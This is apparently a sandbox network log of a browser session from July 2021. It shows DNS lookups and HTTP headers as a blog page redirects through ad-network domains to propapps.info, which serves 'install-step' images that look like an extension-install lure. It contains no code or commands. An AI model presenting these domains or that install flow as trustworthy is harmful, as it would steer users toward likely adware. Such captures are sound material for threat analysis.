                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          content-length: 71884
                                                                                          date: Fri, 09 Jul 2021 23:29:01 GMT
                                                                                          access-control-allow-origin: *
                                                                                          etag: "60dc7bb1-118cc"
                                                                                          expires: Sat, 10 Jul 2021 00:29:01 GMT
                                                                                          last-modified: Fri, 09 Jul 2021 11:53:50 GMT
                                                                                          cache-control: max-age=3600
                                                                                          content-encoding: br
                                                                                          content-type: application/javascript
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          location: /watch/78269050/1?wmode=7&page-url=https%3A%2F%2Fmyactualblog.com%2F%3Fs%3D437507092824204040%26ssk%3D4e08a72f5dc9783aca72b61635530df2%26svar%3D1625873340%26z%3D1294231%26pz%3D2660706%26tb%3D4311621%26l%3D2RIeE0GOb7s2Sio&charset=utf-8&browser-info=pv%3A1%3Agdpr%3A14%3Avf%3A2fhsb6k71knxmy9rf%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A581%3Acn%3A1%3Adp%3A0%3Als%3A98383200869%3Ahid%3A16932263%3Az%3A0%3Ai%3A202107010012524%3Aet%3A1625880324%3Ac%3A1%3Arn%3A195069367%3Arqn%3A1%3Au%3A1625880324636635977%3Aw%3A800x555%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Ans%3A1625880322165%3Ads%3A0%2C0%2C45%2C6%2C340%2C0%2C%2C255%2C0%2C%2C%2C%2C925%3Adsn%3A0%2C0%2C46%2C5%2C341%2C0%2C%2C250%2C1%2C%2C%2C%2C925%3Awv%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1625880324%3At%3APress%20Allow
                                                                                          date: Fri, 09 Jul 2021 23:29:02 GMT
                                                                                          access-control-allow-origin: https://myactualblog.com
                                                                                          set-cookie: yandexuid=6336696301625873342; Expires=Sat, 09-Jul-2022 23:29:02 GMT; Domain=.yandex.ru; Path=/
                                                                                          set-cookie: yabs-sid=2408038311625873342; Path=/
                                                                                          set-cookie: i=rSWOtPWXO93Hebj26ICiWQqed39NjMfbdUGJmCWgTuIPpz21D162kpVuKHdqm8c4noJf9U2MeN562Ua2hX9t+mAZ1Jc=; Expires=Mon, 07-Jul-2031 23:28:59 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
                                                                                          set-cookie: ymex=1657409342.yrts.1625873342#1657409342.yrtsi.1625873342; Expires=Sat, 09-Jul-2022 23:29:02 GMT; Domain=.yandex.ru; Path=/
                                                                                          access-control-allow-credentials: true
                                                                                          pragma: no-cache
                                                                                          x-xss-protection: 1; mode=block
                                                                                          expires: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          last-modified: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          location: /watch/67238875/1?wmode=7&page-url=https%3A%2F%2Fmyactualblog.com%2F%3Fs%3D437507092824204040%26ssk%3D4e08a72f5dc9783aca72b61635530df2%26svar%3D1625873340%26z%3D1294231%26pz%3D2660706%26tb%3D4311621%26l%3D2RIeE0GOb7s2Sio&charset=utf-8&browser-info=pv%3A1%3Agdpr%3A14%3Avf%3A2fhsb6k71knxmy9rf%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A581%3Acn%3A2%3Adp%3A0%3Als%3A940436807676%3Ahid%3A16932263%3Az%3A0%3Ai%3A202107010012524%3Aet%3A1625880324%3Ac%3A1%3Arn%3A685046871%3Arqn%3A1%3Au%3A1625880324636635977%3Aw%3A800x555%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Ans%3A1625880322165%3Ads%3A0%2C0%2C45%2C6%2C340%2C0%2C%2C255%2C0%2C%2C%2C%2C925%3Adsn%3A0%2C0%2C46%2C5%2C341%2C0%2C%2C250%2C1%2C%2C%2C%2C925%3Awv%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1625880324%3At%3APress%20Allow
                                                                                          date: Fri, 09 Jul 2021 23:29:02 GMT
                                                                                          access-control-allow-origin: https://myactualblog.com
                                                                                          set-cookie: yandexuid=4592527301625873342; Expires=Sat, 09-Jul-2022 23:29:02 GMT; Domain=.yandex.ru; Path=/
                                                                                          set-cookie: yabs-sid=2649150231625873342; Path=/
                                                                                          set-cookie: i=gC37a7UKhvUM1xkwXtEpppImNbAywBcA0reluxmM/t+4vZ+t2+BB78sZ7XJ60XShEFqR7N0Imx5yyziRsvfxPJGZ9qA=; Expires=Mon, 07-Jul-2031 23:28:59 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
                                                                                          set-cookie: ymex=1657409342.yrts.1625873342#1657409342.yrtsi.1625873342; Expires=Sat, 09-Jul-2022 23:29:02 GMT; Domain=.yandex.ru; Path=/
                                                                                          access-control-allow-credentials: true
                                                                                          pragma: no-cache
                                                                                          x-xss-protection: 1; mode=block
                                                                                          expires: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          last-modified: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          content-length: 316
                                                                                          date: Fri, 09 Jul 2021 23:29:02 GMT
                                                                                          x-content-type-options: nosniff
                                                                                          access-control-allow-origin: https://myactualblog.com
                                                                                          access-control-allow-credentials: true
                                                                                          pragma: no-cache
                                                                                          x-xss-protection: 1; mode=block
                                                                                          expires: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          last-modified: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          content-type: application/json; charset=utf-8
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          content-length: 316
                                                                                          date: Fri, 09 Jul 2021 23:29:02 GMT
                                                                                          x-content-type-options: nosniff
                                                                                          access-control-allow-origin: https://myactualblog.com
                                                                                          access-control-allow-credentials: true
                                                                                          pragma: no-cache
                                                                                          x-xss-protection: 1; mode=block
                                                                                          expires: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          last-modified: Fri, 09-Jul-2021 23:29:02 GMT
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          content-type: application/json; charset=utf-8
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          content-length: 43
                                                                                          date: Fri, 09 Jul 2021 23:29:02 GMT
                                                                                          access-control-allow-origin: *
                                                                                          etag: "60e838ef-2b"
                                                                                          expires: Sat, 10 Jul 2021 00:29:02 GMT
                                                                                          accept-ranges: bytes
                                                                                          last-modified: Fri, 09 Jul 2021 11:53:50 GMT
                                                                                          cache-control: max-age=3600
                                                                                          content-type: image/gif
                                                                                          strict-transport-security: max-age=31536000
                                                                                        • DNS
                                                                                          yonhelioliskor.com
                                                                                          Request
                                                                                          yonhelioliskor.com
                                                                                          IN A
                                                                                          Response
                                                                                          yonhelioliskor.com
                                                                                          IN A
                                                                                          139.45.196.136
                                                                                          yonhelioliskor.com
                                                                                          IN A
                                                                                          139.45.196.208
                                                                                        • GET
                                                                                          https://myactualblog.com/favicon.ico
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: myactualblog.com
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 204 No Content
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:29:01 GMT
                                                                                          Connection: keep-alive
                                                                                          Strict-Transport-Security: max-age=60
                                                                                          X-Content-Type-Options: nosniff
                                                                                        • DNS
                                                                                          yandex.ocsp-responder.com
                                                                                          Request
                                                                                          yandex.ocsp-responder.com
                                                                                          IN A
                                                                                          Response
                                                                                          yandex.ocsp-responder.com
                                                                                          IN CNAME
                                                                                          cdn.yandex.net
                                                                                          cdn.yandex.net
                                                                                          IN A
                                                                                          5.45.205.241
                                                                                          cdn.yandex.net
                                                                                          IN A
                                                                                          5.45.205.243
                                                                                          cdn.yandex.net
                                                                                          IN A
                                                                                          5.45.205.245
                                                                                          cdn.yandex.net
                                                                                          IN A
                                                                                          5.45.205.242
                                                                                          cdn.yandex.net
                                                                                          IN A
                                                                                          5.45.205.244
                                                                                        • GET
                                                                                          http://yandex.ocsp-responder.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBStniMGfahyWUWDEeSLUFbNR9JLAgQUN1zjGeCyjqGoTtLPq9Dc4wtcNU0CEDbEISBuJVGq0KdX46enAhA%3D
                                                                                          Request
                                                                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBStniMGfahyWUWDEeSLUFbNR9JLAgQUN1zjGeCyjqGoTtLPq9Dc4wtcNU0CEDbEISBuJVGq0KdX46enAhA%3D HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                          Host: yandex.ocsp-responder.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.17.9
                                                                                          Date: Fri, 09 Jul 2021 23:29:01 GMT
                                                                                          Content-Type: application/ocsp-response
                                                                                          Content-Length: 1514
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=5
                                                                                          X-Cached: HIT
                                                                                          Cache-Control: max-age=865
                                                                                        • DNS
                                                                                          jeehathu.com
                                                                                          Request
                                                                                          jeehathu.com
                                                                                          IN A
                                                                                          Response
                                                                                          jeehathu.com
                                                                                          IN A
                                                                                          139.45.197.239
                                                                                        • GET
                                                                                          https://jeehathu.com/4/4311621/?var=1294231
                                                                                          Request
                                                                                          GET /4/4311621/?var=1294231 HTTP/2.0
                                                                                          host: jeehathu.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx
                                                                                          date: Fri, 09 Jul 2021 23:28:57 GMT
                                                                                          content-type: text/html; charset=utf8
                                                                                          x-trace-id: cb184e6a5f6d4b3353ccaeebd3ec01e5
                                                                                          link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
                                                                                          link: <https://dist.propapps.info>; rel="preconnect dns-prefetch",<https://propeller-tracking.com>; rel="preconnect dns-prefetch"
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-credentials: true
                                                                                          access-control-allow-methods: GET, POST, OPTIONS
                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          pragma: no-cache
                                                                                          cache-control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          timing-allow-origin: *
                                                                                          set-cookie: OAID=1d8bfbc63e5c4ffb8c9d64deb7ba5fb9; expires=Sat, 09 Jul 2022 23:29:03 GMT; path=/; secure; SameSite=None
                                                                                          set-cookie: oaidts=1625873343; expires=Sat, 09 Jul 2022 23:29:03 GMT; path=/; secure; SameSite=None
                                                                                          set-cookie: syncedCookie=; expires=Tue, 10 Nov 2009 23:00:00 GMT
                                                                                          pragma: no-cache
                                                                                          cache-control: no-store, no-cache, must-revalidate, max-age=0
                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                        • DNS
                                                                                          dist.propapps.info
                                                                                          Request
                                                                                          dist.propapps.info
                                                                                          IN A
                                                                                          Response
                                                                                          dist.propapps.info
                                                                                          IN CNAME
                                                                                          molecular-suchomimus-xkomlgm1n1kb803m6m4kf3hv.herokudns.com
                                                                                          molecular-suchomimus-xkomlgm1n1kb803m6m4kf3hv.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          molecular-suchomimus-xkomlgm1n1kb803m6m4kf3hv.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          molecular-suchomimus-xkomlgm1n1kb803m6m4kf3hv.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                          molecular-suchomimus-xkomlgm1n1kb803m6m4kf3hv.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                        • GET
                                                                                          https://jeehathu.com/favicon.ico
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/2.0
                                                                                          host: jeehathu.com
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 204
                                                                                          server: nginx
                                                                                          date: Fri, 09 Jul 2021 23:28:58 GMT
                                                                                          expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                          cache-control: max-age=315360000
                                                                                          pragma: public
                                                                                          cache-control: public, must-revalidate, proxy-revalidate
                                                                                        • GET
                                                                                          https://dist.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Request
                                                                                          GET /?c=painst&subid=437507109454622804&cid=4311621 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: dist.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Location: https://www.propapps.info?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Vary: Accept
                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                          Content-Length: 93
                                                                                          Date: Fri, 09 Jul 2021 23:29:03 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • DNS
                                                                                          www.propapps.info
                                                                                          Request
                                                                                          www.propapps.info
                                                                                          IN A
                                                                                          Response
                                                                                          www.propapps.info
                                                                                          IN CNAME
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                        • GET
                                                                                          https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Request
                                                                                          GET /?c=painst&subid=437507109454622804&cid=4311621 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 31284
                                                                                          Etag: "219028420"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/layouts/box/box.css
                                                                                          Request
                                                                                          GET /layouts/box/box.css HTTP/1.1
                                                                                          Accept: text/css, */*
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "10747-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: text/css; charset=UTF-8
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/config.min.js
                                                                                          Request
                                                                                          GET /config.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "1060-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/javascript
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/js/global.min.js
                                                                                          Request
                                                                                          GET /js/global.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "2171-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/javascript
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/images/install-step1-chrome.png
                                                                                          Request
                                                                                          GET /images/install-step1-chrome.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "23056-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 23056
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/images/install-step3.png
                                                                                          Request
                                                                                          GET /images/install-step3.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "14921-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 14921
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/lang/box/BookLot
                                                                                          Request
                                                                                          GET /lang/box/BookLot HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.2056017352.1625880327; _gid=GA1.2.965274542.1625880327; _gat=1; vid=107cba7f-37f8-75c9-9071-d07d0ac0294b
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 4493
                                                                                          Etag: "229326733"
                                                                                          Date: Fri, 09 Jul 2021 23:29:05 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/images/install-step2.png
                                                                                          Request
                                                                                          GET /images/install-step2.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "20738-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 20738
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/resources/Wiki/links.json
                                                                                          Request
                                                                                          GET /resources/Wiki/links.json HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.2056017352.1625880327; _gid=GA1.2.965274542.1625880327; _gat=1; vid=107cba7f-37f8-75c9-9071-d07d0ac0294b
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "389-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:05 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 389
                                                                                          Vary: Accept-Encoding
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/resources/Wiki/background.png
                                                                                          Request
                                                                                          GET /resources/Wiki/background.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.2056017352.1625880327; _gid=GA1.2.965274542.1625880327; _gat=1; vid=107cba7f-37f8-75c9-9071-d07d0ac0294b
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "65781-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:05 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 65781
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/resources/Wiki/logo.png
                                                                                          Request
                                                                                          GET /resources/Wiki/logo.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.2056017352.1625880327; _gid=GA1.2.965274542.1625880327; _gat=1; vid=107cba7f-37f8-75c9-9071-d07d0ac0294b
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "9614-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:05 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 9614
